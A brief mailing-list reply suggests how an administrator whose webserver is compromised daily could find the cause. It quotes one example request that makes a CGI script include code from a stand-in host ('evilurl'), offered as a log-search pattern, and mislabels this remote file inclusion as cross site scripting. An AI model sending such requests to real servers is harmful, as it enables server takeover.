Ross Tsolakidis wrote: > One of our webservers seems to get compromised on a daily basis. > When I do a ps ax I see these processes all the time.
I suspect cross site scripting. You should parse your logs and search for requests like: GET /~stupiduser/buggy-script.cgi?include=http://www.evilurl/malicious-code.txt -- Alf -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
